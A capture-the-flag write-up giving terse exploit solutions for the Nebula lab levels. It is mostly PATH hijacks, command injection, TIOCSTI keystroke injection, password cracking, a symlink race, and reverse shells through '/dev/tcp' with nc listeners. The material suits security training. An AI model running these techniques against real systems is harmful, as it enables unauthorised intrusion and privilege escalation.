https://exploit-exercises.com/nebula/
$ find / -perm -4000 -user flag00 2> /dev/null
$ echo -e '#!/bin/bash\n/bin/sh -c getflag' > ./echo; chmod +x ./echo; PATH=./:"$PATH" /home/flag01/flag01
$ USER='`/bin/sh -c getflag`' /home/flag02/flag02
#!/bin/bash
echo 'getflag > output2' > /home/flag03/writable.d/mz
echo 'Please wait while cron executes your command ...'
while [ ! -f /home/flag03/output2 ]; do sleep 1; done
cat /home/flag03/output2
My comments:
# this won't work (because su won't read the password from stdin, only from the tty)
# echo `DST=/home/flag04; ln -s $DST/token lnk; $DST/flag04 ./lnk` | su -
# this also won't work on Ubuntu (why?)
# echo `DST=/home/flag04; ln -s $DST/token lnk; $DST/flag04 ./lnk` | sudo -u flag04 -S -s getflag
# so to automate it I had to use a trick that I learned from http://vladz.devzero.fr/002_su-stdin.php
My solution:
$ echo -e '#include <stdio.h>\n #include <sys/ioctl.h>\n #include <string.h>\n main(int argc, char *argv[]) { char c[512]; int i; sprintf(c, "%s\\n", argv[1]); for(i=0; i<strlen(c); ++i) ioctl(0,TIOCSTI,c+i);}' | gcc -xc -; (sleep 1; ./a.out `DST=/home/flag04; ln -s $DST/token lnk; $DST/flag04 ./lnk`) & su flag04 -c getflag -
$ cp /home/flag05/.backup/backup-19072011.tgz a.tgz;tar xzf a.tgz; ssh flag05@localhost getflag; rm a.tgz
(remote exploit)
This time you need to run it from an external machine (not the Nebula machine) and provide the IP address of the Nebula machine in the IP variable (for me it is 192.168.1.236).
My notes:
IP=$1
read -r -d '' SRC <<-'EOF'
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
/* Push argv[1] followed by a newline into the controlling terminal's input
   queue with TIOCSTI, so a program that insists on reading its password from
   the tty (su, ssh) receives it as if it had been typed. Run it from the
   background after a short delay, once the foreground program is waiting. */
int main(int argc, char *argv[])
{
    char c[512];
    size_t i;
    if (argc < 2)
        return 1;
    snprintf(c, sizeof c, "%s\n", argv[1]);
    for (i = 0; i < strlen(c); ++i)
        ioctl(0, TIOCSTI, c + i);
    return 0;
}
EOF
echo "$SRC" | gcc -xc -
(sleep 1; ./a.out user1) & su user1
#& scp level06@${IP}:/etc/passwd ./
Solution:
$ IP=192.168.1.236; echo -e '#include <stdio.h>\n #include <sys/ioctl.h>\n #include <string.h>\n main(int argc, char *argv[]) { char c[512]; int i; sprintf(c, "%s\\n", argv[1]); for(i=0; i<strlen(c); ++i) ioctl(0,TIOCSTI,c+i);}' | gcc -xc -; (sleep 1; ./a.out level06;) & scp level06@$IP:/etc/passwd ./; (sleep 1; ./a.out `john ./passwd --show | awk -F: '{print $2}'`;) & ssh flag06@$IP
(remote exploit)
#!/bin/bash
# exploit usage: launch from an external machine; $1 is the IP of the nebula machine,
# $2 and $3 are the IP and port the reverse shell should connect back to
# standard payload to do the level (boring)
PAYLOAD=getflag
# more interesting approach (gives you a reverse shell)
IP=$1
REVERSE_IP=$2
REVERSE_PORT=$3
# URL-encoded form of: bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
PAYLOAD2=bash%20%2Di%20%3E%26%20/dev/tcp/${REVERSE_IP}/${REVERSE_PORT}%200%3E%261
if [ $# -ne 3 ]
then
    echo "Usage: $(basename "$0") <nebula-machine-ip-address> <reverse-ip> <reverse-port>"
    exit 1
fi
# the Host parameter reaches a shell unsanitised: %3B is ';' and ends the intended command
(sleep 1; curl "http://${IP}:7007/index.cgi?Host=localhost%3B${PAYLOAD2}") &
# listen on the same port the payload connects back to
nc -l -p "${REVERSE_PORT}" -vvv
# tshark equivalent of Wireshark's "Follow TCP Stream" in hex mode, on the first (and only) stream:
$ tshark -z follow,tcp,hex,0 -r capture.pcap
# the stream contains an interesting string; the dots are 0x7f (DEL in ASCII, what the client sends for the backspace key):
backdoor...00Rm8.ate
# treating each DEL as a backspace gives the password (echo -e with '\b' simulates the backspaces on a terminal):
$ echo -e "backdoor\b\b\b00Rm8\bate"
backd00Rmate
$ su flag08
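The `echo -e '\b'` trick only moves the cursor on a terminal; it does not actually delete anything, so it fails as soon as the output is piped or saved. As an added example (not part of the original notes), here is a POSIX sh version that decodes the hex dump copied from tshark and really erases one character for every 0x7f. The hex string at the bottom is constructed from the bytes shown above.

```shell
# Turn a hex dump copied from "tshark -z follow,tcp,hex" back into raw bytes.
# Whitespace between the hex digits is ignored. Caveat: a shell variable cannot
# hold a NUL byte, so a stream containing 00 would need a real binary tool
# (xxd -r -p); the captured keystrokes here contain none.
hex_to_raw() {
    hex=$(printf '%s' "$1" | tr -d '[:space:]')
    while [ -n "$hex" ]; do
        pair=${hex%"${hex#??}"}                         # next two hex digits
        hex=${hex#??}
        printf "\\$(printf '%03o' "$((0x$pair))")"      # emit the byte as an octal escape
    done
}

# Replay the captured keystrokes: every 0x7f (DEL) erases the character typed
# before it, exactly as the login prompt on the other end saw it.
apply_backspaces() {
    raw=$1
    out=''
    del=$(printf '\177')
    while [ -n "$raw" ]; do
        c=${raw%"${raw#?}"}
        raw=${raw#?}
        if [ "$c" = "$del" ]; then
            out=${out%?}          # erase the previous character (no-op when empty)
        else
            out="$out$c"
        fi
    done
    printf '%s' "$out"
}

recover_password() {
    apply_backspaces "$(hex_to_raw "$1")"
}

# Constructed sample: the bytes of the "backdoor...00Rm8.ate" line as tshark prints them.
SAMPLE_HEX='62 61 63 6b 64 6f 6f 72 7f 7f 7f 30 30 52 6d 38 7f 61 74 65'
recover_password "$SAMPLE_HEX"
echo
```

Copy the hex column of the client-to-server direction from the tshark output into `SAMPLE_HEX` (or pass it as the argument) to recover whatever was typed, including corrections, from any telnet-style capture.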
classic TOCTOU problem (the binary checks whether the caller may read the path first and opens the same path later, so the path can be swapped in between):
# listen for "file uploads":
$ while [ 1 ]; do nc -l 18211; done
# prepare symlink which alternately links to 'fileToWhichIHaveAccess' and to 'token' files:
$ echo 'fileToWhichIHaveAccess' > /home/level10/fileToWhichIHaveAccess
$ while [ 1 ]; do ln -sf /home/level10/fileToWhichIHaveAccess /tmp/lnk; ln -sf /home/flag10/token /tmp/lnk; rm /tmp/lnk; done
# execute vulnerable binary:
$ while [ 1 ]; do ./flag10 /tmp/lnk 127.0.0.1; done
Vuln:
The string handed to io.popen() is built from the unvalidated password field:
prog = io.popen("echo "..password.." | sha1sum", "r")
So one can simply inject an OS command (a reverse shell, for example):
192.168.8.100$ nc -l -p 2222
victim$ echo "; bash -i >& /dev/tcp/192.168.8.100/2222 0>&1" | nc 127.0.0.1 50001